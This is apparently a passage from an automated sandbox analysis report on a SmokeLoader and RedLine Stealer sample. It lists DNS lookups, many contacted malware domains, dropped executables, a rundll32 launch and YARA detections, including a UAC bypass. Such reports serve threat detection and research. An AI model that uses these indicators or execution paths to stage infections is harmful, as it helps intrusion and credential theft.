                    Nov 30, 2022 00:11:59.321430922 CET8.8.8.8192.168.2.60x8adNo error (0)dowe.at37.234.251.221A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:59.321430922 CET8.8.8.8192.168.2.60x8adNo error (0)dowe.at211.59.14.90A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:59.321430922 CET8.8.8.8192.168.2.60x8adNo error (0)dowe.at175.120.254.9A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:11:59.321430922 CET8.8.8.8192.168.2.60x8adNo error (0)dowe.at187.212.179.75A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:12:00.430341005 CET8.8.8.8192.168.2.60xd88aNo error (0)dowe.at200.46.66.71A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:12:00.430341005 CET8.8.8.8192.168.2.60xd88aNo error (0)dowe.at123.213.233.194A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:12:00.430341005 CET8.8.8.8192.168.2.60xd88aNo error (0)dowe.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:12:00.430341005 CET8.8.8.8192.168.2.60xd88aNo error (0)dowe.at201.124.230.1A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:12:00.430341005 CET8.8.8.8192.168.2.60xd88aNo error (0)dowe.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:12:00.430341005 CET8.8.8.8192.168.2.60xd88aNo error (0)dowe.at37.34.248.24A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:12:00.430341005 CET8.8.8.8192.168.2.60xd88aNo error (0)dowe.at37.234.251.221A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:12:00.430341005 CET8.8.8.8192.168.2.60xd88aNo error (0)dowe.at211.59.14.90A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:12:00.430341005 CET8.8.8.8192.168.2.60xd88aNo error (0)dowe.at175.120.254.9A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:12:00.430341005 CET8.8.8.8192.168.2.60xd88aNo error (0)dowe.at187.212.179.75A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:12:01.541763067 CET8.8.8.8192.168.2.60xcd8fNo error (0)dowe.at211.59.14.90A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:12:01.541763067 CET8.8.8.8192.168.2.60xcd8fNo error (0)dowe.at175.120.254.9A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:12:01.541763067 CET8.8.8.8192.168.2.60xcd8fNo error (0)dowe.at187.212.179.75A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:12:01.541763067 CET8.8.8.8192.168.2.60xcd8fNo error (0)dowe.at200.46.66.71A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:12:01.541763067 CET8.8.8.8192.168.2.60xcd8fNo error (0)dowe.at123.213.233.194A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:12:01.541763067 CET8.8.8.8192.168.2.60xcd8fNo error (0)dowe.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:12:01.541763067 CET8.8.8.8192.168.2.60xcd8fNo error (0)dowe.at201.124.230.1A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:12:01.541763067 CET8.8.8.8192.168.2.60xcd8fNo error (0)dowe.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:12:01.541763067 CET8.8.8.8192.168.2.60xcd8fNo error (0)dowe.at37.34.248.24A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:12:01.541763067 CET8.8.8.8192.168.2.60xcd8fNo error (0)dowe.at37.234.251.221A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:12:03.497956991 CET8.8.8.8192.168.2.60x37f4No error (0)dowe.at211.59.14.90A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:12:03.497956991 CET8.8.8.8192.168.2.60x37f4No error (0)dowe.at175.120.254.9A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:12:03.497956991 CET8.8.8.8192.168.2.60x37f4No error (0)dowe.at187.212.179.75A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:12:03.497956991 CET8.8.8.8192.168.2.60x37f4No error (0)dowe.at200.46.66.71A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:12:03.497956991 CET8.8.8.8192.168.2.60x37f4No error (0)dowe.at123.213.233.194A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:12:03.497956991 CET8.8.8.8192.168.2.60x37f4No error (0)dowe.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:12:03.497956991 CET8.8.8.8192.168.2.60x37f4No error (0)dowe.at201.124.230.1A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:12:03.497956991 CET8.8.8.8192.168.2.60x37f4No error (0)dowe.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:12:03.497956991 CET8.8.8.8192.168.2.60x37f4No error (0)dowe.at37.34.248.24A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:12:03.497956991 CET8.8.8.8192.168.2.60x37f4No error (0)dowe.at37.234.251.221A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:12:05.265032053 CET8.8.8.8192.168.2.60xc889No error (0)dowe.at211.59.14.90A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:12:05.265032053 CET8.8.8.8192.168.2.60xc889No error (0)dowe.at175.120.254.9A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:12:05.265032053 CET8.8.8.8192.168.2.60xc889No error (0)dowe.at187.212.179.75A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:12:05.265032053 CET8.8.8.8192.168.2.60xc889No error (0)dowe.at200.46.66.71A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:12:05.265032053 CET8.8.8.8192.168.2.60xc889No error (0)dowe.at123.213.233.194A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:12:05.265032053 CET8.8.8.8192.168.2.60xc889No error (0)dowe.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:12:05.265032053 CET8.8.8.8192.168.2.60xc889No error (0)dowe.at201.124.230.1A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:12:05.265032053 CET8.8.8.8192.168.2.60xc889No error (0)dowe.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:12:05.265032053 CET8.8.8.8192.168.2.60xc889No error (0)dowe.at37.34.248.24A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:12:05.265032053 CET8.8.8.8192.168.2.60xc889No error (0)dowe.at37.234.251.221A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:12:07.953203917 CET8.8.8.8192.168.2.60x9ea3No error (0)dowe.at200.46.66.71A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:12:07.953203917 CET8.8.8.8192.168.2.60x9ea3No error (0)dowe.at123.213.233.194A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:12:07.953203917 CET8.8.8.8192.168.2.60x9ea3No error (0)dowe.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:12:07.953203917 CET8.8.8.8192.168.2.60x9ea3No error (0)dowe.at201.124.230.1A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:12:07.953203917 CET8.8.8.8192.168.2.60x9ea3No error (0)dowe.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:12:07.953203917 CET8.8.8.8192.168.2.60x9ea3No error (0)dowe.at37.34.248.24A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:12:07.953203917 CET8.8.8.8192.168.2.60x9ea3No error (0)dowe.at37.234.251.221A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:12:07.953203917 CET8.8.8.8192.168.2.60x9ea3No error (0)dowe.at211.59.14.90A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:12:07.953203917 CET8.8.8.8192.168.2.60x9ea3No error (0)dowe.at175.120.254.9A (IP address)IN (0x0001)false
                    Nov 30, 2022 00:12:07.953203917 CET8.8.8.8192.168.2.60x9ea3No error (0)dowe.at187.212.179.75A (IP address)IN (0x0001)false
                    • thepokeway.nl
                    • tajcoxqjmd.com
                      • dowe.at
                    • owxfgf.net
                    • dqkjujneki.com
                    • yfupv.net
                    • lawtvrqx.org
                    • 123.253.32.170
                    • frwum.com
                    • ifardcruc.org
                    • gbbshbjmpq.com
                    • dkguxo.org
                    • frdxrq.org
                    • plraoc.net
                    • panajd.com
                    • queeh.org
                    • lvqyks.com
                    • oidcj.com
                    • ljwdjes.org
                    • bajxyhac.net
                    • fbxsgv.net
                    • xjvagowrnc.org
                    • ueuounaic.org
                    • vhxqowscaf.net
                    • nqdpmu.com
                    • nxslssk.org
                    • rbdses.com
                    • jxvmoh.net
                    • hlixtq.net
                    • bymgj.net
                    • jviyq.org
                    • papeicwkil.net
                    • csplko.com
                    • ecwfh.net
                    • avfvrfo.net
                    • ouqhut.net
                    • amjtlofw.net
                    • mrgphm.org

                    Click to jump to process

                    Target ID:0
                    Start time:00:10:00
                    Start date:30/11/2022
                    Path:C:\Users\user\Desktop\file.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\Desktop\file.exe
                    Imagebase:0x400000
                    File size:149504 bytes
                    MD5 hash:1CF06BEB83D2BD1AFD1B9B62994E7549
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.340150414.0000000002080000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.340150414.0000000002080000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.339969412.0000000000509000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000003.247155743.0000000002080000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.340103222.0000000002070000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.340254010.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.340254010.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                    Reputation:low

                    Target ID:1
                    Start time:00:10:07
                    Start date:30/11/2022
                    Path:C:\Windows\explorer.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\Explorer.EXE
                    Imagebase:0x7ff647860000
                    File size:3933184 bytes
                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000000.327101814.0000000004E61000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000001.00000000.327101814.0000000004E61000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
                    Reputation:high

                    Target ID:9
                    Start time:00:10:59
                    Start date:30/11/2022
                    Path:C:\Users\user\AppData\Roaming\dfhwrav
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\AppData\Roaming\dfhwrav
                    Imagebase:0x400000
                    File size:149504 bytes
                    MD5 hash:1CF06BEB83D2BD1AFD1B9B62994E7549
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000009.00000002.385320932.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000009.00000002.385320932.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000009.00000002.385296441.0000000002080000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000009.00000002.385296441.0000000002080000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000009.00000003.373157026.0000000002080000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000009.00000002.384994661.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000009.00000002.385082783.00000000006F8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                    Antivirus matches:
                    • Detection: 100%, Joe Sandbox ML
                    Reputation:low

                    Target ID:10
                    Start time:00:11:16
                    Start date:30/11/2022
                    Path:C:\Users\user\AppData\Local\Temp\ADCA.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\AppData\Local\Temp\ADCA.exe
                    Imagebase:0x400000
                    File size:3776000 bytes
                    MD5 hash:2479739C5D062ECB325147623241F007
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:Borland Delphi
                    Yara matches:
                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000A.00000002.477294048.00000000025CA000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000A.00000002.503903306.0000000002950000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                    Antivirus matches:
                    • Detection: 100%, Joe Sandbox ML
                    Reputation:low

                    Target ID:13
                    Start time:00:11:36
                    Start date:30/11/2022
                    Path:C:\Windows\SysWOW64\rundll32.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\system32\rundll32.exe C:\Users\user\AppData\Local\Temp\Serpodtudpwhhta.dll,start
                    Imagebase:0x1b0000
                    File size:61952 bytes
                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:Borland Delphi
                    Reputation:high

                    Target ID:16
                    Start time:00:11:39
                    Start date:30/11/2022
                    Path:C:\Users\user\AppData\Local\Temp\5AF.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\AppData\Local\Temp\5AF.exe
                    Imagebase:0x400000
                    File size:478208 bytes
                    MD5 hash:C81AB83835C2669DBE57C43DB54571B7
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000010.00000002.491008397.00000000005E9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000010.00000002.486093572.0000000000413000.00000040.00000001.01000000.0000000B.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000010.00000002.495741535.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                    Antivirus matches:
                    • Detection: 100%, Joe Sandbox ML
                    Reputation:low

                    Target ID:19
                    Start time:00:11:48
                    Start date:30/11/2022
                    Path:C:\Windows\SysWOW64\WerFault.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 688
                    Imagebase:0x10e0000
                    File size:434592 bytes
                    MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high

                    Target ID:22
                    Start time:00:11:52
                    Start date:30/11/2022
                    Path:C:\Users\user\AppData\Local\Temp\5AF.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\AppData\Local\Temp\5AF.exe"
                    Imagebase:0x400000
                    File size:478208 bytes
                    MD5 hash:C81AB83835C2669DBE57C43DB54571B7
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000016.00000002.521716515.00000000020C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000016.00000002.517229882.0000000000413000.00000040.00000001.01000000.0000000B.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000016.00000002.518252636.000000000059E000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                    Reputation:low

                    Target ID:23
                    Start time:00:12:04
                    Start date:30/11/2022
                    Path:C:\Windows\SysWOW64\WerFault.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 688
                    Imagebase:0x10e0000
                    File size:434592 bytes
                    MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high

                    No disassembly